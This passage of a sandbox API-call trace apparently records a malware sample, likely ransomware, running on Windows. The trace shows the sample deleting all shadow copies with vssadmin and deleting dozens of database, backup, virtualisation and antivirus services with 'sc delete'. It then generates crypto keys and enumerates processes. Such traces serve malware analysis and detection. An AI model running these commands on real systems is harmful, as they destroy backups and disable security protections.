(_Func=0x7ff6c0210f10) returned 0x7ff6c0210f10 [0057.439] _onexit (_Func=0x7ff6c0210f04) returned 0x7ff6c0210f04 [0057.439] _onexit (_Func=0x7ff6c0210f2c) returned 0x7ff6c0210f2c [0057.439] _onexit (_Func=0x7ff6c0210f20) returned 0x7ff6c0210f20 [0057.439] _onexit (_Func=0x7ff6c0210f48) returned 0x7ff6c0210f48 [0057.439] _onexit (_Func=0x7ff6c0210f3c) returned 0x7ff6c0210f3c [0057.440] _onexit (_Func=0x7ff6c0210f64) returned 0x7ff6c0210f64 [0057.440] _onexit (_Func=0x7ff6c0210f58) returned 0x7ff6c0210f58 [0057.525] WinExec (lpCmdLine="vssadmin delete shadows /all /quiet", uCmdShow=0x0) returned 0x21 [0057.709] WinExec (lpCmdLine="sc delete \"vmickvpexchange\"", uCmdShow=0x0) returned 0x21 [0057.818] WinExec (lpCmdLine="sc delete \"vmicguestinterface\"", uCmdShow=0x0) returned 0x21 [0057.823] WinExec (lpCmdLine="sc delete \"vmicshutdown\"", uCmdShow=0x0) returned 0x21 [0057.827] WinExec (lpCmdLine="sc delete \"vmicheartbeat\"", uCmdShow=0x0) returned 0x21 [0057.831] WinExec (lpCmdLine="sc delete \"vmicrdv\"", uCmdShow=0x0) returned 0x21 [0057.836] WinExec (lpCmdLine="sc delete \"storflt\"", uCmdShow=0x0) returned 0x21 [0057.840] WinExec (lpCmdLine="sc delete \"vmictimesync\"", uCmdShow=0x0) returned 0x21 [0057.844] WinExec (lpCmdLine="sc delete \"vmicvss\"", uCmdShow=0x0) returned 0x21 [0057.849] WinExec (lpCmdLine="sc delete \"MSSQLFDLauncher\"", uCmdShow=0x0) returned 0x21 [0057.853] WinExec (lpCmdLine="sc delete \"MSSQLSERVER\"", uCmdShow=0x0) returned 0x21 [0057.857] WinExec (lpCmdLine="sc delete \"SQLSERVERAGENT\"", uCmdShow=0x0) returned 0x21 [0057.862] WinExec (lpCmdLine="sc delete \"SQLBrowser\"", uCmdShow=0x0) returned 0x21 [0057.866] WinExec (lpCmdLine="sc delete \"SQLTELEMETRY\"", uCmdShow=0x0) returned 0x21 [0057.871] WinExec (lpCmdLine="sc delete \"MsDtsServer130\"", uCmdShow=0x0) returned 0x21 [0057.875] WinExec (lpCmdLine="sc delete \"SSISTELEMETRY130\"", uCmdShow=0x0) returned 0x21 [0057.880] WinExec (lpCmdLine="sc delete \"SQLWriter\"", uCmdShow=0x0) returned 0x21 [0057.884] WinExec (lpCmdLine="sc delete \"MSSQL$VEEAMSQL2012\"", uCmdShow=0x0) returned 0x21 [0059.221] WinExec (lpCmdLine="sc delete \"SQLAgent$VEEAMSQL2012\"", uCmdShow=0x0) returned 0x21 [0059.229] WinExec (lpCmdLine="sc delete \"MSSQL\"", uCmdShow=0x0) returned 0x21 [0059.233] WinExec (lpCmdLine="sc delete \"SQLAgent\"", uCmdShow=0x0) returned 0x21 [0059.237] WinExec (lpCmdLine="sc delete \"MSSQLServerADHelper100\"", uCmdShow=0x0) returned 0x21 [0059.240] WinExec (lpCmdLine="sc delete \"MSSQLServerOLAPService\"", uCmdShow=0x0) returned 0x21 [0059.244] WinExec (lpCmdLine="sc delete \"MsDtsServer100\"", uCmdShow=0x0) returned 0x21 [0059.248] WinExec (lpCmdLine="sc delete \"ReportServer\"", uCmdShow=0x0) returned 0x21 [0059.251] WinExec (lpCmdLine="sc delete \"SQLTELEMETRY$HL\"", uCmdShow=0x0) returned 0x21 [0059.254] WinExec (lpCmdLine="sc delete \"TMBMServer\"", uCmdShow=0x0) returned 0x21 [0059.258] WinExec (lpCmdLine="sc delete \"MSSQL$PROGID\"", uCmdShow=0x0) returned 0x21 [0059.263] WinExec (lpCmdLine="sc delete \"MSSQL$WOLTERSKLUWER\"", uCmdShow=0x0) returned 0x21 [0059.266] WinExec (lpCmdLine="sc delete \"SQLAgent$PROGID\"", uCmdShow=0x0) returned 0x21 [0059.270] WinExec (lpCmdLine="sc delete \"SQLAgent$WOLTERSKLUWER\"", uCmdShow=0x0) returned 0x21 [0059.274] WinExec (lpCmdLine="sc delete \"MSSQLFDLauncher$OPTIMA\"", uCmdShow=0x0) returned 0x21 [0059.278] WinExec (lpCmdLine="sc delete \"MSSQL$OPTIMA\"", uCmdShow=0x0) returned 0x21 [0059.282] WinExec (lpCmdLine="sc delete \"SQLAgent$OPTIMA\"", uCmdShow=0x0) returned 0x21 [0059.286] printf (_Format="%s\n") returned 32 [0059.287] WinExec (lpCmdLine="sc delete \"ReportServer$OPTIMA\"", uCmdShow=0x0) returned 0x21 [0059.291] WinExec (lpCmdLine="sc delete \"msftesql$SQLEXPRESS\"", uCmdShow=0x0) returned 0x21 [0059.296] WinExec (lpCmdLine="sc delete \"postgresql-x64-9.4\"", uCmdShow=0x0) returned 0x21 [0059.300] WinExec (lpCmdLine="sc delete \"WRSVC\"", uCmdShow=0x0) returned 0x21 [0059.304] WinExec (lpCmdLine="sc delete \"KLIF\"", uCmdShow=0x0) returned 0x21 [0059.309] WinExec (lpCmdLine="sc delete \"klpd\"", uCmdShow=0x0) returned 0x21 [0059.313] WinExec (lpCmdLine="sc delete \"klflt\"", uCmdShow=0x0) returned 0x21 [0059.317] WinExec (lpCmdLine="sc delete \"klbackupdisk\"", uCmdShow=0x0) returned 0x21 [0059.321] WinExec (lpCmdLine="sc delete \"klbackupflt\"", uCmdShow=0x0) returned 0x21 [0059.325] WinExec (lpCmdLine="sc delete \"klkbdflt\"", uCmdShow=0x0) returned 0x21 [0059.329] WinExec (lpCmdLine="sc delete \"klmouflt\"\"", uCmdShow=0x0) returned 0x21 [0059.333] WinExec (lpCmdLine="sc delete \"klhk\"", uCmdShow=0x0) returned 0x21 [0059.337] WinExec (lpCmdLine="sc delete \"KSDE1.0.0\"", uCmdShow=0x0) returned 0x21 [0059.341] WinExec (lpCmdLine="sc delete \"kltap\"", uCmdShow=0x0) returned 0x21 [0059.345] WinExec (lpCmdLine="sc delete \"TmFilter\"", uCmdShow=0x0) returned 0x21 [0059.349] WinExec (lpCmdLine="sc delete \"TMLWCSService\"", uCmdShow=0x0) returned 0x21 [0059.352] WinExec (lpCmdLine="sc delete \"tmusa\"", uCmdShow=0x0) returned 0x21 [0059.357] WinExec (lpCmdLine="sc delete \"TmPreFilter\"", uCmdShow=0x0) returned 0x21 [0059.361] WinExec (lpCmdLine="sc delete \"TMSmartRelayService\"", uCmdShow=0x0) returned 0x21 [0059.366] WinExec (lpCmdLine="sc delete \"VSApiNt\"", uCmdShow=0x0) returned 0x21 [0059.370] WinExec (lpCmdLine="sc delete \"TmCCSF\"", uCmdShow=0x0) returned 0x21 [0059.374] WinExec (lpCmdLine="sc delete \"tmlisten\"", uCmdShow=0x0) returned 0x21 [0059.378] WinExec (lpCmdLine="sc delete \"TmProxy\"", uCmdShow=0x0) returned 0x21 [0059.382] WinExec (lpCmdLine="sc delete \"ntrtscan\"", uCmdShow=0x0) returned 0x21 [0059.387] WinExec (lpCmdLine="sc delete \"ofcservice\"", uCmdShow=0x0) returned 0x21 [0059.391] WinExec (lpCmdLine="sc delete \"UniFi\"", uCmdShow=0x0) returned 0x21 [0059.396] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe\" " [0059.396] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe\" ", pNumArgs=0x84b0fdf970 | out: pNumArgs=0x84b0fdf970) returned 0x84b11c8f90*="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe" [0059.396] CryptAcquireContextA (in: phProv=0x84b0fdf6b0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x84b0fdf6b0*=0x84b11ce640) returned 1 [0063.775] _onexit (_Func=0x7ff6c0210d44) returned 0x7ff6c0210d44 [0063.775] RtlWakeAllConditionVariable (in: ConditionVariable=0x7ff6c02244e0 | out: ConditionVariable=0x7ff6c02244e0) [0063.775] CryptAcquireContextA (in: phProv=0x84b1166960, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x84b1166960*=0x84b11c8c40) returned 1 [0063.776] CryptGenRandom (in: hProv=0x84b11c8c40, dwLen=0x20, pbBuffer=0x84b1167b60 | out: pbBuffer=0x84b1167b60) returned 1 [0063.776] CryptReleaseContext (hProv=0x84b11ce640, dwFlags=0x0) returned 1 [0063.777] QueryPerformanceCounter (in: lpPerformanceCount=0x84b0fdf5b0 | out: lpPerformanceCount=0x84b0fdf5b0*=414478908) returned 1 [0063.777] _time64 (in: _Time=0x0 | out: _Time=0x0) returned 0x5b443c1b [0063.777] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x198 [0063.788] Process32FirstW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0063.788] wcslen (_String="[System Process]") returned 0x10 [0063.789] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x64, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0063.789] wcslen (_String="System") returned 0x6 [0063.789] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0063.790] wcslen (_String="smss.exe") returned 0x8 [0063.790] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0063.791] wcslen (_String="csrss.exe") returned 0x9 [0063.791] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0063.792] wcslen (_String="wininit.exe") returned 0xb [0063.792] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0063.793] wcslen (_String="csrss.exe") returned 0x9 [0063.793] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0063.793] wcslen (_String="winlogon.exe") returned 0xc [0063.793] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0063.795] wcslen (_String="services.exe") returned 0xc [0063.795] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0063.796] wcslen (_String="lsass.exe") returned 0x9 [0063.796] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.796] wcslen (_String="svchost.exe") returned 0xb [0063.796] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.797] wcslen (_String="svchost.exe") returned 0xb [0063.797] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0063.798] wcslen (_String="dwm.exe") returned 0x7 [0063.798] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.798] wcslen (_String="svchost.exe") returned 0xb [0063.798] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.799] wcslen (_String="svchost.exe") returned 0xb [0063.799] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.800] wcslen (_String="svchost.exe") returned 0xb [0063.800] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3a, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.800] wcslen (_String="svchost.exe") returned 0xb [0063.800] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.801] wcslen (_String="svchost.exe") returned 0xb [0063.801] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x264, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.802] wcslen (_String="svchost.exe") returned 0xb [0063.802] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x2a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0063.802] wcslen (_String="spoolsv.exe") returned 0xb [0063.802] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.803] wcslen (_String="svchost.exe") returned 0xb [0063.803] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.803] wcslen (_String="svchost.exe") returned 0xb [0063.803] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0063.804] wcslen (_String="OfficeClickToRun.exe") returned 0x14 [0063.804] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.805] wcslen (_String="svchost.exe") returned 0xb [0063.805] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0063.805] wcslen (_String="sihost.exe") returned 0xa [0063.805] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0063.806] wcslen (_String="taskhostw.exe") returned 0xd [0063.806] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x42, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0064.889] wcslen (_String="explorer.exe") returned 0xc [0064.889] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0064.890] wcslen (_String="RuntimeBroker.exe") returned 0x11 [0064.890] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0064.891] wcslen (_String="ShellExperienceHost.exe") returned 0x17 [0064.891] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0064.892] wcslen (_String="SearchUI.exe") returned 0xc [0064.892] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="beds rice.exe")) returned 1 [0064.893] wcslen (_String="beds rice.exe") returned 0xd [0064.893] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="crashuwimperialoils.exe")) returned 1 [0064.894] wcslen (_String="crashuwimperialoils.exe") returned 0x17 [0064.894] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="exceptions_refers.exe")) returned 1 [0064.894] wcslen (_String="exceptions_refers.exe") returned 0x15 [0064.894] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="pantyhose-timber-sponsored.exe")) returned 1 [0064.895] wcslen (_String="pantyhose-timber-sponsored.exe") returned 0x1e [0064.895] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="invision-tissue-universe-alliance.exe")) returned 1 [0064.896] wcslen (_String="invision-tissue-universe-alliance.exe") returned 0x25 [0064.896] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="peoplesdrawedited.exe")) returned 1 [0064.897] wcslen (_String="peoplesdrawedited.exe") returned 0x15 [0064.897] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="veterinaryexistence.exe")) returned 1 [0064.898] wcslen (_String="veterinaryexistence.exe") returned 0x17 [0064.898] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="verifytorture.exe")) returned 1 [0064.899] wcslen (_String="verifytorture.exe") returned 0x11 [0064.899] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="declaration.exe")) returned 1 [0064.899] wcslen (_String="declaration.exe") returned 0xf [0064.899] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="gossip_vocal_outlet.exe")) returned 1 [0064.900] wcslen (_String="gossip_vocal_outlet.exe") returned 0x17 [0064.900] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="hrs housewives orange advantages.exe")) returned 1 [0064.901] wcslen (_String="hrs housewives orange advantages.exe") returned 0x24 [0064.901] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="hour sponsored.exe")) returned 1 [0064.902] wcslen (_String="hour sponsored.exe") returned 0x12 [0064.902] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="dk chester theft ye.exe")) returned 1 [0064.903] wcslen (_String="dk chester theft ye.exe") returned 0x17 [0064.903] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="manufactured_engaged_shift_have.exe")) returned 1 [0064.904] wcslen (_String="manufactured_engaged_shift_have.exe") returned 0x23 [0064.904] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="band.exe")) returned 1 [0064.905] wcslen (_String="band.exe") returned 0x8 [0064.905] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="economies.exe")) returned 1 [0064.906] wcslen (_String="economies.exe") returned 0xd [0064.906] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="minimal-extreme.exe")) returned 1 [0064.906] wcslen (_String="minimal-extreme.exe") returned 0x13 [0064.906] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="neuralexpandcancellationeuro.exe")) returned 1 [0064.907] wcslen (_String="neuralexpandcancellationeuro.exe") returned 0x20 [0064.907] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0064.908] wcslen 